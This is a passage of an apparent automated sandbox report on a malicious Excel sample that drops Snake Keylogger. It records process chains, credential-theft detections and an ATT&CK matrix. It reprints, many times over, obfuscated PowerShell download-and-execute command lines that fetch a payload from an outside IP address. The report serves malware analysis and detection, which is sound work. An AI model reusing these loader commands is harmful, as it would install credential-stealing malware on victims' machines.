XNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES866F.tmp" "c:\Users\user\AppData\Local\Temp\tnesdt30\CSC4AC68FDA20F44DF3BBC22D1FFF1AFB9.TMP"
            Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jflticagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc10wvblicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfckrlzmlusxrjb24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbw9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpvcxgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagwgv0dvn2rxmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagvmvslhvpbnqgicagicagicagicagicagicagicagicagicagicagicbudeussw50uhryicagicagicagicagicagicagicagicagicagicagicagtgtqzerqktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicagicaitvaiicagicagicagicagicagicagicagicagicagicagicaglw5hbuvtugfdrsagicagicagicagicagicagicagicagicagicagicagignjbgfmr2lhynzyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrzbto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizljyvnzcwl2rsbghvc3quzxhliiwijevodjpbufbeqvrbxgrsbghvc3quzxhliiwwldapo3nuqxj0lxnszuvwkdmpo1n0qvjuicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxkbgxob3n0lmv4zsi='+[char]0x22+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jflticagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc10wvblicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfckrlzmlusxrjb24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbw9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpvcxgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagwgv0dvn2rxmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagvmvslhvpbnqgicagicagicagicagicagicagicagicagicagicagicbudeussw50uhryicagicagicagicagicagicagicagicagicagicagicagtgtqzerqktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicagicaitvaiicagicagicagicagicagicagicagicagicagicagicaglw5hbuvtugfdrsagicagicagicagicagicagicagicagicagicagicagignjbgfmr2lhynzyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrzbto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizljyvnzcwl2rsbghvc3quzxhliiwijevodjpbufbeqvrbxgrsbghvc3quzxhliiwwldapo3nuqxj0lxnszuvwkdmpo1n0qvjuicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxkbgxob3n0lmv4zsi='+[char]0x22+'))')))"
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jflticagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc10wvblicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfckrlzmlusxrjb24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbw9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpvcxgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagwgv0dvn2rxmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagvmvslhvpbnqgicagicagicagicagicagicagicagicagicagicagicbudeussw50uhryicagicagicagicagicagicagicagicagicagicagicagtgtqzerqktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicagicaitvaiicagicagicagicagicagicagicagicagicagicagicaglw5hbuvtugfdrsagicagicagicagicagicagicagicagicagicagicagignjbgfmr2lhynzyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrzbto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizljyvnzcwl2rsbghvc3quzxhliiwijevodjpbufbeqvrbxgrsbghvc3quzxhliiwwldapo3nuqxj0lxnszuvwkdmpo1n0qvjuicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxkbgxob3n0lmv4zsi='+[char]0x22+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jflticagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc10wvblicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfckrlzmlusxrjb24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbw9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpvcxgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagwgv0dvn2rxmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagvmvslhvpbnqgicagicagicagicagicagicagicagicagicagicagicbudeussw50uhryicagicagicagicagicagicagicagicagicagicagicagtgtqzerqktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicagicaitvaiicagicagicagicagicagicagicagicagicagicagicaglw5hbuvtugfdrsagicagicagicagicagicagicagicagicagicagicagignjbgfmr2lhynzyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrzbto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizljyvnzcwl2rsbghvc3quzxhliiwijevodjpbufbeqvrbxgrsbghvc3quzxhliiwwldapo3nuqxj0lxnszuvwkdmpo1n0qvjuicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxkbgxob3n0lmv4zsi='+[char]0x22+'))')))"
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jflticagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc10wvblicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfckrlzmlusxrjb24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbw9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpvcxgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagwgv0dvn2rxmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagvmvslhvpbnqgicagicagicagicagicagicagicagicagicagicagicbudeussw50uhryicagicagicagicagicagicagicagicagicagicagicagtgtqzerqktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicagicaitvaiicagicagicagicagicagicagicagicagicagicagicaglw5hbuvtugfdrsagicagicagicagicagicagicagicagicagicagicagignjbgfmr2lhynzyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrzbto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizljyvnzcwl2rsbghvc3quzxhliiwijevodjpbufbeqvrbxgrsbghvc3quzxhliiwwldapo3nuqxj0lxnszuvwkdmpo1n0qvjuicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxkbgxob3n0lmv4zsi='+[char]0x22+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jflticagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc10wvblicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfckrlzmlusxrjb24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbw9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpvcxgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagwgv0dvn2rxmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagvmvslhvpbnqgicagicagicagicagicagicagicagicagicagicagicbudeussw50uhryicagicagicagicagicagicagicagicagicagicagicagtgtqzerqktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicagicaitvaiicagicagicagicagicagicagicagicagicagicagicaglw5hbuvtugfdrsagicagicagicagicagicagicagicagicagicagicagignjbgfmr2lhynzyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrzbto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizljyvnzcwl2rsbghvc3quzxhliiwijevodjpbufbeqvrbxgrsbghvc3quzxhliiwwldapo3nuqxj0lxnszuvwkdmpo1n0qvjuicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxkbgxob3n0lmv4zsi='+[char]0x22+'))')))"Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jflticagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc10wvblicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfckrlzmlusxrjb24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbw9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpvcxgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagwgv0dvn2rxmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagvmvslhvpbnqgicagicagicagicagicagicagicagicagicagicagicbudeussw50uhryicagicagicagicagicagicagicagicagicagicagicagtgtqzerqktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicagicaitvaiicagicagicagicagicagicagicagicagicagicagicaglw5hbuvtugfdrsagicagicagicagicagicagicagicagicagicagicagignjbgfmr2lhynzyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrzbto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizljyvnzcwl2rsbghvc3quzxhliiwijevodjpbufbeqvrbxgrsbghvc3quzxhliiwwldapo3nuqxj0lxnszuvwkdmpo1n0qvjuicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxkbgxob3n0lmv4zsi='+[char]0x22+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jflticagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc10wvblicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfckrlzmlusxrjb24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbw9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpvcxgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagwgv0dvn2rxmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagvmvslhvpbnqgicagicagicagicagicagicagicagicagicagicagicbudeussw50uhryicagicagicagicagicagicagicagicagicagicagicagtgtqzerqktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicagicaitvaiicagicagicagicagicagicagicagicagicagicagicaglw5hbuvtugfdrsagicagicagicagicagicagicagicagicagicagicagignjbgfmr2lhynzyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrzbto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizljyvnzcwl2rsbghvc3quzxhliiwijevodjpbufbeqvrbxgrsbghvc3quzxhliiwwldapo3nuqxj0lxnszuvwkdmpo1n0qvjuicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxkbgxob3n0lmv4zsi='+[char]0x22+'))')))"
            Source: dllhost.exe, 0000000B.00000000.440804644.0000000000482000.00000002.00000001.01000000.0000000B.sdmp, dllhost.exe, 00000016.00000000.477390475.0000000000482000.00000002.00000001.01000000.0000000B.sdmp, dllhost.exe.7.dr, dllhost[1].exe.7.drBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 0000000E.00000002.630259466.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.630259466.000000000270D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.630215962.000000000250D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.630215962.0000000002361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3108, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: Yara matchFile source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3108, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 0000000E.00000002.630259466.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.630259466.000000000270D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.630215962.000000000250D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.630215962.0000000002361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3108, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting            		Valid Accounts13
            Exploitation for Client Execution            		1
            Scripting            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		13
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts111
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		212
            Process Injection            		21
            Obfuscated Files or Information            		LSASS Memory114
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts3
            PowerShell            		Logon Script (Windows)Logon Script (Windows)1
            Install Root Certificate            		Security Account Manager11
            Security Software Discovery            		SMB/Windows Admin Shares11
            Email Collection            		2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS2
            Process Discovery            		Distributed Component Object Model1
            Clipboard Data            		23
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading            		LSA Secrets21
            Virtualization/Sandbox Evasion            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
            Virtualization/Sandbox Evasion            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items212
            Process Injection            		DCSync1
            Remote System Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            System Network Configuration Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1522511 Sample: SYSN ORDER.xls Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 98 Multi AV Scanner detection for domain / URL 2->98 100 Suricata IDS alerts for network traffic 2->100 102 Found malware configuration 2->102 104 14 other signatures 2->104 10 EXCEL.EXE 57 29 2->10         started        process3 dnsIp4 66 172.245.123.6, 49164, 49166, 49167 AS-COLOCROSSINGUS United States 10->66 68 og1.in 172.67.216.244, 443, 49163, 49165 CLOUDFLARENETUS United States 10->68 62 C:\Users\user\Desktop\SYSN ORDER.xls (copy), Composite 10->62 dropped 64 C:\Users\...\IEnetbokkworkingforupdate[1].hta, HTML 10->64 dropped 120 Microsoft Office drops suspicious files 10->120 15 mshta.exe 10 10->15         started        19 mshta.exe 10 10->19         started        file5 signatures6 process7 dnsIp8 80 og1.in 15->80 86 Suspicious command line found 15->86 88 PowerShell case anomaly found 15->88 21 cmd.exe 15->21         started        82 104.21.78.54, 443, 49169, 49170 CLOUDFLARENETUS United States 19->82 84 og1.in 19->84 24 cmd.exe 19->24         started        signatures9 process10 signatures11 106 Suspicious powershell command line found 21->106 108 PowerShell case anomaly found 21->108 26 powershell.exe 24 21->26         started        30 powershell.exe 24->30         started        process12 file13 56 C:\Users\user\AppData\Roaming\dllhost.exe, PE32 26->56 dropped 58 C:\Users\user\AppData\...\dllhost[1].exe, PE32 26->58 dropped 60 C:\Users\user\AppData\...\ngxpd0hb.cmdline, Unicode 26->60 dropped 110 Installs 